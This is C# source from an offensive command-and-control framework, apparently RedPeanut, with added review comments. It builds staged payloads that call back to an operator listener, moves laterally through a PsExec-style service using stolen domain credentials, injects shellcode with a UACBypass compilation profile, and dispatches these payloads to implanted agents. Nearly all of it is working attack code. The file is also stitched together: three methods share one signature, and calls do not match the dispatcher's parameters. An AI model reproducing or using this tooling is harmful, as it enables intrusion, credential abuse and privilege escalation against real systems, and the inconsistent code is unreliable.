/// <summary>
/// Builds and queues this module's three-stage payload: a stager (HTTP or named-pipe, chosen by
/// <c>lpipename</c>), embedded into a service executable built from SERVICE_TEMPLATE, which is in
/// turn embedded into an assembly built from SHARPSEXEC_TEMPLATE and handed to
/// <see cref="RunAssemblyBase64"/> for the selected agent. Each stage is compiled with
/// Builder.BuidStreamAssembly, gzip-compressed and base64-encoded.
/// Returns silently when a required field is missing, the profile id is unknown, or no agent is selected.
/// Detection note: the generated artifact carries the supplied domain credentials and an
/// operator-chosen or random 10-character service/executable name in plaintext template fields.
/// </summary>
private void Run()
{
    // NOTE(review): 'args' is never read in this method.
    List<string> args = new List<string>();
    // Required operator inputs: credentials, target host, listener host, a non-zero profile id,
    // and either a listener port or a pipe name.
    if (username == null || password == null || domain == null || targethost == null || lhost == null || profile == 0 || (lport == 0 && lpipename == null))
    {
        return;
    }
    else
    {
        //Create stager stream gzip
        string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
        if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
        {
            string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
            if (lpipename == null)
            {
                //Http no pivot stager
                ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                // NOTE(review): target framework is hard-coded to 40 throughout this method, unlike the
                // sibling Run() methods that use the agent's TargetFramework.
                source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
            }
            else
            {
                //NamedPipe enable stager
                ListenerPivotConfig conf = new ListenerPivotConfig("", lhost, lpipename, Program.GetC2Manager().GetC2Server().GetProfile(profile));
                source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
            }
            // Stage 1: the stager assembly (random 10-character name, no extension here).
            string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()), 40)));
            //Create TaskMsg gzip
            if (agent != null)
            {
                ModuleConfig modconfig = new ModuleConfig { Assembly = stagerstr, Method = "Execute", Moduleclass = "RedPeanutRP", Parameters = new string[] { "pippo" } };
                TaskMsg task = new TaskMsg { TaskType = "module", ModuleTask = modconfig, Agentid = agent.AgentId };
                // Route through the pivot agent when this agent was reached via another one.
                if (agent.Pivoter != null)
                {
                    task.AgentPivot = agent.Pivoter.AgentId;
                }
                //Create Service stream gzip
                // Stage 2: the service template carries the serialized TaskMsg (gzip+base64) and the
                // profile's Spawn string. NOTE(review): Encoding.Default is platform-dependent; whatever
                // decodes #TASK# on the other side must use the same encoding.
                source = File.ReadAllText(Path.Combine(folderrpath, SERVICE_TEMPLATE))
                    .Replace("#NUTCLR#", ReadResourceFile(PL_COMMAND_NUTCLR))
                    .Replace("#TASK#", Convert.ToBase64String(CompressGZipAssembly(Encoding.Default.GetBytes(JsonConvert.SerializeObject(task)))))
                    .Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profile).Spawn);
                string servicestr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()), 40, "exe")));
                //Create SharpPsExec stream gzip
                // Stage 3: credentials and target are substituted into the template source verbatim, so
                // the compiled assembly (and any copy of it recovered later) contains them in the clear.
                // Each name falls back to a fresh 10-character random string when the operator left it empty.
                // NOTE(review): the "#HOSTANME#" placeholder spelling must match the template file exactly.
                source = File.ReadAllText(Path.Combine(folderrpath, SHARPSEXEC_TEMPLATE))
                    .Replace("#DOMAIN#", domain)
                    .Replace("#USERNAME#", username)
                    .Replace("#PASSWORD#", password)
                    .Replace("#HOSTANME#", targethost)
                    .Replace("#ASSEMBLY#", servicestr)
                    .Replace("#EXENAME#", (!string.IsNullOrEmpty(exename)) ? exename : RandomAString(10, new Random()) + ".exe")
                    .Replace("#SERVICEDISPLAYNAME#", (!string.IsNullOrEmpty(servdispname)) ? servdispname : RandomAString(10, new Random()))
                    .Replace("#SERVICEDESCRIPTION#", (!string.IsNullOrEmpty(servdescr)) ? servdescr : RandomAString(10, new Random()))
                    .Replace("#SERVICENAME#", (!string.IsNullOrEmpty(servname)) ? servname : RandomAString(10, new Random()));
                string sharppsexecstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));
                // Queue the outer assembly for the agent; entry type is "SharpPsExec.Program".
                RunAssemblyBase64(sharppsexecstr, "SharpPsExec.Program", new string[] { "pippo" }, agent);
            }
        }
    }
}
/// <summary>
/// Builds a "spawn into process" task for the current agent: derives the listener parameters from
/// the agent (or, for a pivoted agent, from its Pivoter and the server's default profile), compiles
/// a stager from STAGER_TEMPLATE, wraps its TaskMsg into SPAWN_TEMPLATE with the operator-supplied
/// <c>process</c>, compiles that with CompilationProfile.UACBypass, and queues it via
/// <see cref="RunAssemblyBase64"/>.
/// Any exception is swallowed and reported as a single console line; no details are logged.
/// </summary>
private void Run()
{
    try
    {
        // NOTE(review): these four values are overwritten in both branches below. The unconditional
        // casts will throw if 'agent' is not an AgentInstanceHttp, which the catch-all then hides.
        string host = ((AgentInstanceHttp)agent).GetAddress();
        int port = ((AgentInstanceHttp)agent).GetPort();
        int profileid = ((AgentInstanceHttp)agent).GetProfileid();
        int targetframework = ((AgentInstanceHttp)agent).TargetFramework;
        string pipename = "";
        if (agent.Pivoter != null)
        {
            // Pivoted agent: reach it through the pivoter's IP over a named pipe named after this agent.
            host = agent.Pivoter.SysInfo.Ip;
            port = 0;
            profileid = RedPeanutC2.server.GetDefaultProfile();
            targetframework = agent.TargetFramework;
            pipename = agent.AgentId;
        }
        else
        {
            host = ((AgentInstanceHttp)agent).GetAddress();
            port = ((AgentInstanceHttp)agent).GetPort();
            profileid = ((AgentInstanceHttp)agent).GetProfileid();
            targetframework = agent.TargetFramework;
        }
        string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
        if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profileid))
        {
            string source;
            if (string.IsNullOrEmpty(pipename))
            {
                //Http no pivot stager
                ListenerConfig conf = new ListenerConfig("", host, port, Program.GetC2Manager().GetC2Server().GetProfile(profileid), profileid);
                source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
            }
            else
            {
                //NamedPipe enable stager
                ListenerPivotConfig conf = new ListenerPivotConfig("", host, pipename, Program.GetC2Manager().GetC2Server().GetProfile(profileid));
                source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
            }
            // Stager assembly with a random 10-character .dll name, compiled for the agent's framework.
            string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework)));
            ModuleConfig modconfig = new ModuleConfig { Assembly = stagerstr, Method = "Execute", Moduleclass = "RedPeanutRP", Parameters = new string[] { "pippo" } };
            TaskMsg task = new TaskMsg { TaskType = "module", ModuleTask = modconfig, Agentid = agent.AgentId };
            if (agent.Pivoter != null)
            {
                task.AgentPivot = agent.Pivoter.AgentId;
            }
            // Spawn template: task-based variant, so the shellcode and credential placeholders are
            // replaced with null (string.Replace treats a null replacement as removing the placeholder).
            // NOTE(review): Encoding.Default is platform-dependent; the decoder must match it.
            source = File.ReadAllText(Path.Combine(folderrpath, SPAWN_TEMPLATE))
                .Replace("#NUTCLR#", ReadResourceFile(PL_COMMAND_NUTCLRWNF))
                .Replace("#TASK#", Convert.ToBase64String(CompressGZipAssembly(Encoding.Default.GetBytes(JsonConvert.SerializeObject(task)))))
                .Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profileid).Spawn)
                .Replace("#SHELLCODE#", null)
                .Replace("#USERNAME#", null)
                .Replace("#PASSWORD#", null)
                .Replace("#DOMAIN#", null)
                .Replace("#PROCESS#", process);
            string spawnprocess = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework, compprofile: CompilationProfile.UACBypass)));
            RunAssemblyBase64( spawnprocess, "RedPeanutSpawn", new string[] { " " }, agent);
        }
    }
    catch (Exception)
    {
        // NOTE(review): catch-all discards the exception; the message also has a typo ("Errore").
        Console.WriteLine("[*] Errore generating task");
    }
}
/// <summary>
/// Builds a "spawn with shellcode" task for the current agent: reads a binary file named
/// <c>filename</c> from SHELLCODE_FOLDER, embeds it (gzip+base64) together with the supplied
/// credentials into SPAWN_TEMPLATE, compiles that with CompilationProfile.UACBypass for the agent's
/// framework, and queues it via <see cref="RunAssemblyBase64"/>.
/// The listener-derivation block is shared with the task-based spawn variant; only the template
/// substitutions differ (task placeholders are nulled, shellcode/credential placeholders are filled).
/// Any exception is swallowed and reported as a single console line.
/// </summary>
private void Run()
{
    try
    {
        // NOTE(review): overwritten in both branches below; the casts throw for a non-HTTP agent instance.
        string host = ((AgentInstanceHttp)agent).GetAddress();
        int port = ((AgentInstanceHttp)agent).GetPort();
        int profileid = ((AgentInstanceHttp)agent).GetProfileid();
        int targetframework = ((AgentInstanceHttp)agent).TargetFramework;
        string pipename = "";
        if (agent.Pivoter != null)
        {
            host = agent.Pivoter.SysInfo.Ip;
            port = 0;
            profileid = RedPeanutC2.server.GetDefaultProfile();
            targetframework = agent.TargetFramework;
            pipename = agent.AgentId;
        }
        else
        {
            host = ((AgentInstanceHttp)agent).GetAddress();
            port = ((AgentInstanceHttp)agent).GetPort();
            profileid = ((AgentInstanceHttp)agent).GetProfileid();
            targetframework = agent.TargetFramework;
        }
        string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
        if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profileid))
        {
            string source;
            // NOTE(review): 'filename' is not validated; Path.Combine returns an absolute 'filename'
            // unchanged, so the read is not confined to SHELLCODE_FOLDER.
            string binfilepath = Path.Combine(folderrpath, SHELLCODE_FOLDER, filename);
            // Credentials are substituted into the template source verbatim and therefore end up in
            // the compiled assembly in the clear.
            source = File.ReadAllText(Path.Combine(folderrpath, SPAWN_TEMPLATE))
                .Replace("#NUTCLR#", null)
                .Replace("#TASK#", null)
                .Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profileid).Spawn)
                .Replace("#SHELLCODE#", Convert.ToBase64String(CompressGZipAssembly(File.ReadAllBytes(binfilepath))))
                .Replace("#USERNAME#", username)
                .Replace("#PASSWORD#", password)
                .Replace("#DOMAIN#", domain)
                .Replace("#PROCESS#", null);
            string spawnprocess = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework, compprofile: CompilationProfile.UACBypass)));
            RunAssemblyBase64( spawnprocess, "RedPeanutSpawn", new string[] { " " }, agent);
        }
    }
    catch (Exception)
    {
        // NOTE(review): catch-all discards the exception details (e.g. a missing shellcode file).
        Console.WriteLine("[*] Error generating task");
    }
}
/// <summary>
/// Wraps a base64 assembly into a TaskMsg and sends it to <paramref name="agent"/>.
/// The task shape depends on <paramref name="tasktype"/>: "download" builds a FileDownloadConfig,
/// "migrate" a ModuleConfig with TaskType "migrate", anything else (including null) a ModuleConfig
/// with TaskType "module". In the default case an unmanaged agent receives the assembly converted
/// to shellcode by Builder.GenerateShellcode instead of the assembly itself.
/// </summary>
/// <param name="assembly">Base64-encoded assembly to run.</param>
/// <param name="method">Entry method name.</param>
/// <param name="type">Entry type (stored as Moduleclass).</param>
/// <param name="args">Arguments forwarded to the entry method; copied with ToArray.</param>
/// <param name="agent">Destination agent; its Pivoter, if any, becomes AgentPivot.</param>
/// <param name="tasktype">"download", "migrate", or null/other for a plain module task.</param>
/// <param name="destfilename">Destination file name, used only for "download".</param>
/// <param name="instanceid">Task instance id; a random 10-character string when null.</param>
public static void RunAssemblyBase64(string assembly, string method, string type, string[] args, IAgentInstance agent, string tasktype = null, string destfilename = null, string instanceid = null)
{
    switch (tasktype)
    {
        case "download":
            FileDownloadConfig downloadconfig = new FileDownloadConfig { Assembly = assembly, Method = method, Moduleclass = type, Parameters = args.ToArray<string>(), FileNameDest = destfilename };
            TaskMsg downloadtask = new TaskMsg { TaskType = "download", DownloadTask = downloadconfig, Agentid = agent.AgentId };
            if (instanceid == null)
            {
                downloadtask.Instanceid = RandomAString(10, new Random());
            }
            else
            {
                downloadtask.Instanceid = instanceid;
            }
            if (agent.Pivoter != null)
            {
                downloadtask.AgentPivot = agent.Pivoter.AgentId;
            }
            agent.SendCommand(downloadtask);
            break;
        case "migrate":
            ModuleConfig migrateconfig = new ModuleConfig { Assembly = assembly, Method = method, Moduleclass = type, Parameters = args.ToArray<string>() };
            TaskMsg migratetask = new TaskMsg { TaskType = "migrate", ModuleTask = migrateconfig, Agentid = agent.AgentId };
            if (instanceid == null)
            {
                migratetask.Instanceid = RandomAString(10, new Random());
            }
            else
            {
                migratetask.Instanceid = instanceid;
            }
            if (agent.Pivoter != null)
            {
                migratetask.AgentPivot = agent.Pivoter.AgentId;
            }
            agent.SendCommand(migratetask);
            break;
        default:
            ModuleConfig modconfig = new ModuleConfig { Assembly = assembly, Method = method, Moduleclass = type, Parameters = args.ToArray<string>() };
            // Managed agents get the assembly as-is (the initializer above already set it, so this
            // branch is a no-op); unmanaged agents get a shellcode conversion under a random .exe name.
            if (agent.Managed)
            {
                modconfig.Assembly = assembly;
            }
            else
            {
                modconfig.Assembly = Convert.ToBase64String(CompressGZipAssembly(Builder.GenerateShellcode( assembly, RandomAString(10, new Random()) + ".exe", type, method, args)));
            }
            TaskMsg task = new TaskMsg { TaskType = "module", ModuleTask = modconfig, Agentid = agent.AgentId };
            if (instanceid == null)
            {
                task.Instanceid = RandomAString(10, new Random());
            }
            else
            {
                task.Instanceid = instanceid;
            }
            if (agent.Pivoter != null)
            {
                task.AgentPivot = agent.Pivoter.AgentId;
            }
            agent.SendCommand(task);
            break;
    }
}